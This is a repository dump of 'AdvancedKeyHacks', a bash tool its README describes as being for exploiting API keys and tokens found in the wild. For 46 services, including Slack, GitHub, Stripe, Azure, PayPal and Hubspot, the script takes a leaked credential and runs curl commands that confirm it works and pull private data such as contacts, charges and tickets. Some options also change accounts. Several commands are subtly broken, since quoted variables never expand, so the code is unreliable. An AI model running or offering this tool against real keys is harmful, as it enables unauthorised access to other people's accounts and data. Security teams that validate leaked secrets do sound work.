├── ThreatDragonModels └── test │ └── test.json ├── LICENSE ├── README.md └── hackcura_apikey_hacks.sh /ThreatDragonModels/test/test.json: -------------------------------------------------------------------------------- 1 | { 2 | "summary": { 3 | "title": "test", 4 | "owner": "sen", 5 | "description": "test" 6 | }, 7 | "detail": { 8 | "contributors": [], 9 | "diagrams": [] 10 | } 11 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 udit-thakkur 4 | Copyright (c) 2020 Hackcura 5 | 6 | Permission is hereby granted, free of charge, to any person obtaining a copy 7 | of this software and associated documentation files (the "Software"), to deal 8 | in the Software without restriction, including without limitation the rights 9 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 10 | copies of the Software, and to permit persons to whom the Software is 11 | furnished to do so, subject to the following conditions: 12 | 13 | The above copyright notice and this permission notice shall be included in all 14 | copies or substantial portions of the Software. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 19 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 21 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 22 | SOFTWARE. 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AdvancedKeyHacks 2 | 3 | > This tool is for exploitation of API tokens/keys. Right now, We have added APIs that can be found in wild. With time, we will add more exploitable API Keys/Tokens. 4 | 5 | ## Installation: 6 | 7 | - apt-get install jq (for linux) | brew install jq (for MAC OS) 8 | 9 | - git clone https://github.com/udit-thakkur/AdvancedKeyHacks.git 10 | 11 | - cd AdvancedKeyHacks 12 | 13 | - chmod +x hackcura_apikey_hacks.sh 14 | 15 | ## Usage: 16 | 17 | - ./hackcura_apikey_hacks.sh 18 | 19 | ## Donation (Buy Me a Coffee): 20 | You can encourage me me to contribute more to the open source with donations. 21 | NEVER ASKED BUT ALWAYS APPRECIATED. 22 | - PayPal - https://paypal.me/uditbhadauria 23 | - Credit/Debit Card - https://www.buymeacoffee.com/uditthakkur 24 | 25 | ## Team: 26 | >Udit Thakkur - https://www.twitter.com/udit_thakkur 27 | 28 | >Harshit Sengar - https://www.twitter.com/sengarharshit1 29 | 30 | ## Credits To: 31 | @streaak (Creator of KeyHacks) - https://github.com/streaak/keyhacks 32 | 33 | 34 | ## Note: 35 | If you find any mistake or any new API Key/Token that is exploitable, feel free to open a pull requests/issues. 36 | 37 | ## Legal Disclaimer: 38 | The script is made for educational and ethical purposes only. Usage of the script for attacking targets without prior mutual consent is illegal. Team Hackcura is not responsible for any misuse or damage caused by this script. 39 | -------------------------------------------------------------------------------- /hackcura_apikey_hacks.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "" 3 | echo " Made with <3 by team " 4 | echo " _ _ _ ____ _ __ ____ _ _ ____ _ " 5 | echo "| | | | / \ / ___| | |/ / / ___| | | | | | _ \ / \ " 6 | echo "| |_| | / _ \ | | | ' / | | | | | | | |_) | / _ \ " 7 | echo "| _ | / ___ \ | |___ | . \ | |___ | |_| | | _ < / ___ \ " 8 | echo "|_| |_| /_/ \_\ \____| |_|\_\ \____| \___/ |_| \_\ /_/ \_\ " 9 | echo "" 10 | echo "Creator: udit_thakkur (https://twitter.com/udit_thakkur) " 11 | echo " Harshit Sengar (https://twitter.com/sengarharshit1)" 12 | 13 | echo "" 14 | echo " 1. Slack API Token 2. Saucelabs Username and Access Key 3. Firebase Custom Token and API key " 15 | echo " 4. Github Username & Token/key 5. Github Client ID and Secret 6. Google Cloud Messaging Key " 16 | echo " 7. Twilio Account_SID & Secret Key 8. Twitter API key & Secret 9. Twitter Bearer/Auth Token " 17 | echo " 10. Hubspot API key 11. Deviant Art Client ID & Secret key 12. Validation of Deviant Art Token " 18 | echo " 13. Pendo Integration Key 14. SendGrid API Token 15. Square Auth Token " 19 | echo " 16. Square ClientID, Secret & Token 17. Dropbox API Bearer/Auth Token 18. MailGun Private Key " 20 | echo " 19. Jumpcloud API key 20. Heroku API key/Bearer Token 21. Microsoft Azure Client ID, secret & Tenant ID " 21 | echo " 22. Mapbox API key 23. Salesforce API Key/Bearer Token 24. Zapier Webhook URL & Username " 22 | echo " 25. FreshDesk Domain & API key 26. PagerDuty API Token 27. Browser Stack Access Key and Username " 23 | echo " 28. Google MAPS API key 29. Branch.io Key & secret 30. bit.ly Access Token " 24 | echo " 31. Buildkite Access Token 32. Asana Access Token/Bearer Token 33. Zendesk helpdesl domain & Access Token " 25 | echo " 34. Mailchimp Accesskey and Username 35. WPEngine API key & Account Name 36. DataDog API Key & Application Key " 26 | echo " 37. Travis CI API Token 38. WakaTime API Key 39. Spotify Access Token/Bearer Token " 27 | echo " 40. Instagram Access Token 41. Gitlab Personal/Private Token 42. Stripe Live Token " 28 | echo " 43. CicrcleCI Access Token 44. Razorpay API Key ID & Secret Key 45. Paypal ClientID & Secret " 29 | echo " 46. IP Stack Key " 30 | echo "" 31 | echo -n "Enter the respective number from list that you want to exploit: " 32 | read number 33 | echo "" 34 | 35 | case $number in 36 | 1) 37 | echo -n "Enter Slack API Token: " 38 | read slack 39 | curl -sX POST "https://slack.com/api/auth.test?token=xoxp-$slack&pretty=1" 40 | ;; 41 | 42 | 2) 43 | echo -n "Enter SauceLabs Username: " 44 | read Username 45 | echo -n "Enter the SauceLabs Access Key: " 46 | read key 47 | curl -u $Username:$key https://saucelabs.com/rest/v1/users/$Username 48 | ;; 49 | 50 | 3) 51 | echo -n "Enter Firebase Custom Token: " 52 | read token 53 | echo -n "Enter the Firebase API key: " 54 | read key 55 | Id_token=$(curl -s -XPOST -H 'content-type: application/json' -d '{"token":":$token","returnSecureToken":True}' 'https://identitytoolkit.googleapis.com/v1/accounts:signInWithCustomToken?key=:$key' | grep idToken | grep id | cut -f 1 | tr -d "," ) 56 | curl -s -XPOST -H 'content-type: application/json' -d '{$Id_token}' 'https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyCustomToken?key=:$key' 57 | ;; 58 | 59 | 4) 60 | echo -n "Enter Github Username: " 61 | read user 62 | echo -n "Enter Github Token/Key: " 63 | read key 64 | curl -s -u "$user:$key" https://api.github.com/user 65 | curl -s -H "Authorization: token $key" "https://api.github.com/users/$user/orgs" 66 | curl -s "https://api.github.com/rate_limit" -i -u "$user:$key" | grep "X-OAuth-Scopes:" 67 | ;; 68 | 69 | 5) 70 | echo -n "Enter Github Client ID: " 71 | read id 72 | echo -n "Enter Github Client Secret: " 73 | read secret 74 | curl 'https://api.github.com/users/whatever?client_id=$id&client_secret=$secret' 75 | ;; 76 | 77 | 6) 78 | echo -n "Enter Google Cloud Messaging key: " 79 | read key 80 | curl -s -X POST --header "Authorization: key=$key" --header "Content-Type:application/json" 'https://gcm-http.googleapis.com/gcm/send' -d '{"registration_ids":["1"]}' 81 | echo "" 82 | ;; 83 | 84 | 7) 85 | echo -n "Enter Twilio Account_SID: " 86 | read sid 87 | echo -n "Enter Twilio Auth Token: " 88 | read token 89 | curl -s -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u $sid:$token | jq . 90 | ;; 91 | 92 | 8) 93 | echo -n "Enter Twitter API Key: " 94 | read key 95 | echo -n "Enter Twitter API Secret Key: " 96 | read secret 97 | bearer=$(curl -s -u '$key:$secret' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token' | cut -d '"' -f 8 ) 98 | curl -s --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer $bearer' | jq . 99 | ;; 100 | 101 | 9) 102 | echo -n "Enter the Twitter bearer token: " 103 | read token 104 | curl -s --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer $bearer' | jq . 105 | ;; 106 | 107 | 10) 108 | echo -n "Enter Hubspot API Key: " 109 | read key 110 | curl -s https://api.hubapi.com/owners/v2/owners?hapikey=$key | jq . 111 | curl -s https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey=$key | jq . 112 | ;; 113 | 114 | 11) 115 | echo -n "Enter Deviant Art Client ID (Numeric): " 116 | read id 117 | echo -n "Enter Deviant Art Secret Key: " 118 | read key 119 | curl -s https://www.deviantart.com/oauth2/token -d grant_type=client_credentials -d client_id=$id -d client_secret=$key | jq . 120 | ;; 121 | 122 | 12) 123 | echo -n "Enter Deviant Art Access Token to check whether it is valid or not: " 124 | read token 125 | curl -s https://www.deviantart.com/api/v1/oauth2/placebo -d access_token=$token | jq . 126 | ;; 127 | 128 | 13) 129 | echo -n "Enter Pendo Integration Key: " 130 | read key 131 | curl -X GET https://app.pendo.io/api/v1/feature -H 'content-type: application/json' -H 'x-pendo-integration-key:$key' 132 | curl -X GET https://app.pendo.io/api/v1/metadata/schema/account -H 'content-type: application/json' -H 'x-pendo-integration-key:$key' 133 | ;; 134 | 135 | 14) 136 | echo -n "Enter SendGrid API Token: " 137 | read token 138 | curl -s -X "GET" "https://api.sendgrid.com/v3/scopes" -H "Authorization: Bearer $token" -H "Content-Type: application/json" | jq . 139 | ;; 140 | 141 | 15) 142 | echo -n "Enter Square Auth Token: " 143 | read auth 144 | curl -s https://connect.squareup.com/v2/locations -H "Authorization: Bearer $auth" | jq . 145 | ;; 146 | 147 | 16) 148 | echo -n "Enter Square App ID/Client ID {starts with sq0}: " 149 | read id 150 | echo -n "Enter Square Client Secret {starts with EAAA}: " 151 | read secret 152 | echo -n "Enter Square Access Token (Some Random String if none e.g. sefjkjrefvgidsrbjnklcedh): " 153 | read token 154 | curl "https://squareup.com/oauth2/revoke" -d '{"access_token":"$token","client_id":"$id"}' -H "Content-Type: application/json" -H "Authorization: Client $secret" 155 | ;; 156 | 157 | 17) 158 | echo -n "Enter DropBox API Bearer Token: " 159 | read token 160 | curl -X POST https://api.dropboxapi.com/2/users/get_current_account --header "Authorization: Bearer $token" 161 | echo "" 162 | ;; 163 | 164 | 18) 165 | echo -n "Enter MailGun Private Key: " 166 | read private 167 | curl -s --user 'api:$private' "https://api.mailgun.net/v3/domains" | jq . 168 | ;; 169 | 170 | 19) 171 | echo -n "Enter JumpCloud Api Key: " 172 | read key 173 | curl -H "x-api-key: $key" "https://console.jumpcloud.com/api/systems" 174 | echo "" 175 | ;; 176 | 177 | 21) 178 | echo -n "Enter Microsoft Azure Client ID: " 179 | read id 180 | echo -n "Enter Microsoft Azure Client Secret: " 181 | read secret 182 | echo -n "Enter Microsoft Azure Tenant ID: " 183 | read tenant 184 | curl -s -X POST -H "Content-Type: application/x-www-form-urlencoded" -d 'client_id=$id&scope=https%3A%2F%2Fgraph.microsoft.com%2F.default&client_secret=$secret&grant_type=client_credentials' 'https://login.microsoftonline.com/$tenant/oauth2/v2.0/token' | jq . 185 | ;; 186 | 187 | 20) 188 | echo -n "Enter Heroku API key/ Bearer Token: " 189 | read token 190 | curl -X POST https://api.heroku.com/apps -H "Accept: application/vnd.heroku+json; version=3" -H "Authorization: Bearer $token" 191 | ;; 192 | 193 | 22) 194 | echo -n "Enter Mapbox API key: " 195 | read key 196 | curl -s "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token=$key" | jq . 197 | ;; 198 | 199 | 23) 200 | echo -n "Enter Salesforce API key / Bearer Token: " 201 | read key 202 | echo -n "Enter Salesforce URL (e.g. https://test.salesforce.com): " 203 | read url 204 | curl $url/services/data/v20.0/ -H 'Authorization: Bearer $key' 205 | ;; 206 | 207 | 24) 208 | echo -n "Enter Zapier Webhook URL: " 209 | read url 210 | echo -n "Enter UserName/Name: " 211 | read name 212 | curl -H "Accept: application/json" -H "Content-Type: application/json" -X POST -d '{"name":"$name"}' "$url" 213 | ;; 214 | 215 | 25) 216 | echo -n "Enter FreshDesk Domain name (Helpdesk) e.g. https://test.freshdesk.com: " 217 | read domain 218 | echo -n "Enter FreshDesk API key: " 219 | read key 220 | curl -v -u $key:X -H "Content-Type: application/json" '$domain/api/v2/tickets' 221 | ;; 222 | 223 | 26) 224 | echo -n "Enter Pagerduty API token: " 225 | read token 226 | curl -H "Accept: application/vnd.pagerduty+json;version=2" -H "Authorization: Token token=$token" -X GET "https://api.pagerduty.com/schedules" 227 | echo "" 228 | ;; 229 | 230 | 27) 231 | echo -n "Enter Browser Stack Access key: " 232 | read key 233 | echo -n "Enter Browser Stack Username: " 234 | read username 235 | curl -u "$username:$key" https://api.browserstack.com/automate/plan.json 236 | ;; 237 | 238 | 28) 239 | echo -n "Enter Google Map API key: " 240 | read key 241 | curl -H "referer: http://example.com" "https://maps.googleapis.com/maps/api/directions/json?origin=Stockholm&destination=Kalmar&key=$key" 242 | ;; 243 | 244 | 29) 245 | echo -n "Enter Branch.io key: " 246 | read key 247 | echo -n "Enter Branch.io Secret: " 248 | read secret 249 | curl -s https://api2.branch.io/v1/app/$key?branch_secret=$secret | jq . 250 | ;; 251 | 252 | 30) 253 | echo -n "Enter bit.ly Access Token: " 254 | read token 255 | curl -s https://api-ssl.bitly.com/v3/shorten?access_token=$token | jq . 256 | ;; 257 | 258 | 31) 259 | echo -n "Enter Buildkite Access Token: " 260 | read token 261 | curl -H "Authorization: Bearer $token" https://api.buildkite.com/v2/user 262 | ;; 263 | 264 | 32) 265 | echo -n "Enter Asana Access Token/Bearer Token: " 266 | read token 267 | curl -s -H "Authorization: Bearer $token" https://app.asana.com/api/1.0/users/me | jq . 268 | ;; 269 | 270 | 33) 271 | echo -n "Enter Zendesk domain name (Helpdesk Of company e.g. https://companyname.zendesk.com): " 272 | read url 273 | echo -n "Enter Zendesk Access Token/ Bearer Token: " 274 | read token 275 | curl $url/api/v2/tickets.json -H "Authorization: Bearer $token" 276 | ;; 277 | 278 | 34) 279 | echo -n "Enter the MailChimp Access Key: " 280 | read key 281 | dc=$(echo $key | rev | cut -c1-3 | rev) 282 | echo -n "Enter MailChimp username (If found none, then give any random string): " 283 | read username 284 | curl --request GET --url 'https://'$dc'.api.mailchimp.com/3.0/' --user '$username:$key' --include 285 | ;; 286 | 287 | 35) 288 | echo -n "Enter WPEngine API key: " 289 | read key 290 | echo -n "Enter WPEngine Account Name: " 291 | read name 292 | curl -s "https://api.wpengine.com/1.2/?method=site&account_name=$name&wpe_apikey=$key" | jq . 293 | ;; 294 | 295 | 36) 296 | echo -n "Enter DataDog API Key: " 297 | read key 298 | echo -n "Enter DataDog Application Key: " 299 | read app 300 | curl -s "https://api.datadoghq.com/api/v1/dashboard?api_key=$key&application_key=$app" | jq . 301 | ;; 302 | 303 | 37) 304 | echo -n "Enter Travis CI API Token: " 305 | read token 306 | curl -H "Travis-API-Version: 3" -H "Authorization: token $token" https://api.travis-ci.com/user 307 | echo "" 308 | ;; 309 | 310 | 38) 311 | echo -n "Enter WakaTime API key: " 312 | read key 313 | curl -s "https://wakatime.com/api/v1/users/current/projects/?api_key=$key" | jq . 314 | ;; 315 | 316 | 39) 317 | echo -n "Enter Spotify Access Token/ Bearer Token: " 318 | read token 319 | curl -H "Authorization: Bearer $token" https://api.spotify.com/v1/me 320 | echo "" 321 | ;; 322 | 323 | 40) 324 | echo -n "Enter Instagram Access Token: " 325 | read token 326 | curl -s https://api.instagram.com/v1/users/self/?access_token=$token | jq . 327 | ;; 328 | 329 | 41) 330 | echo -n "Enter Gitlab Personal/Private Access Token: " 331 | read token 332 | echo -n "Enter Gitlab Company URL (e.g. https://companyname.gitlab.com): " 333 | read url 334 | curl "$url/api/v4/projects?private_token=$token" 335 | ;; 336 | 337 | 42) 338 | echo -n "Enter Stripe Live Token: " 339 | read token 340 | curl -s https://api.stripe.com/v1/charges -u $token: | jq . 341 | ;; 342 | 343 | 43) 344 | echo -n "Enter CircleCI Access Token: " 345 | read token 346 | curl -s https://circleci.com/api/v1.1/me?circle-token=$token | jq . 347 | ;; 348 | 349 | 44) 350 | echo -n "Razorpay API key ID: " 351 | read key 352 | echo -n "Razorpay Secret key: " 353 | read secret 354 | curl -s -u $key:$secret https://api.razorpay.com/v1/payments | jq . 355 | ;; 356 | 357 | 45) 358 | echo -n "Enter Paypal Client Id: " 359 | read client 360 | echo -n "Enter Paypal Secret: " 361 | read secret 362 | curl -s -v https://api.sandbox.paypal.com/v1/oauth2/token -H "Accept: application/json" -H "Accept-Language: en_US" -u "$client:$secret" -d "grant_type=client_credentials" 363 | bearer=$(curl -s -v https://api.sandbox.paypal.com/v1/oauth2/token -H "Accept: application/json" -H "Accept-Language: en_US" -u "$client:$secret" -d "grant_type=client_credentials") 364 | curl -s -v -X GET "https://api.sandbox.paypal.com/v1/identity/oauth2/userinfo?schema=paypalv1.1" -H "Content-Type: application/json" -H "Authorization: Bearer $bearer" 365 | echo "" 366 | ;; 367 | 368 | 46) 369 | echo -n "Enter IPStack Key: " 370 | read key 371 | curl -s https://api.ipstack.com/check?access_key=$key | jq . 372 | ;; 373 | 374 | *) 375 | echo "Please give valid choice!!!" 376 | ;; 377 | 378 | esac 379 | --------------------------------------------------------------------------------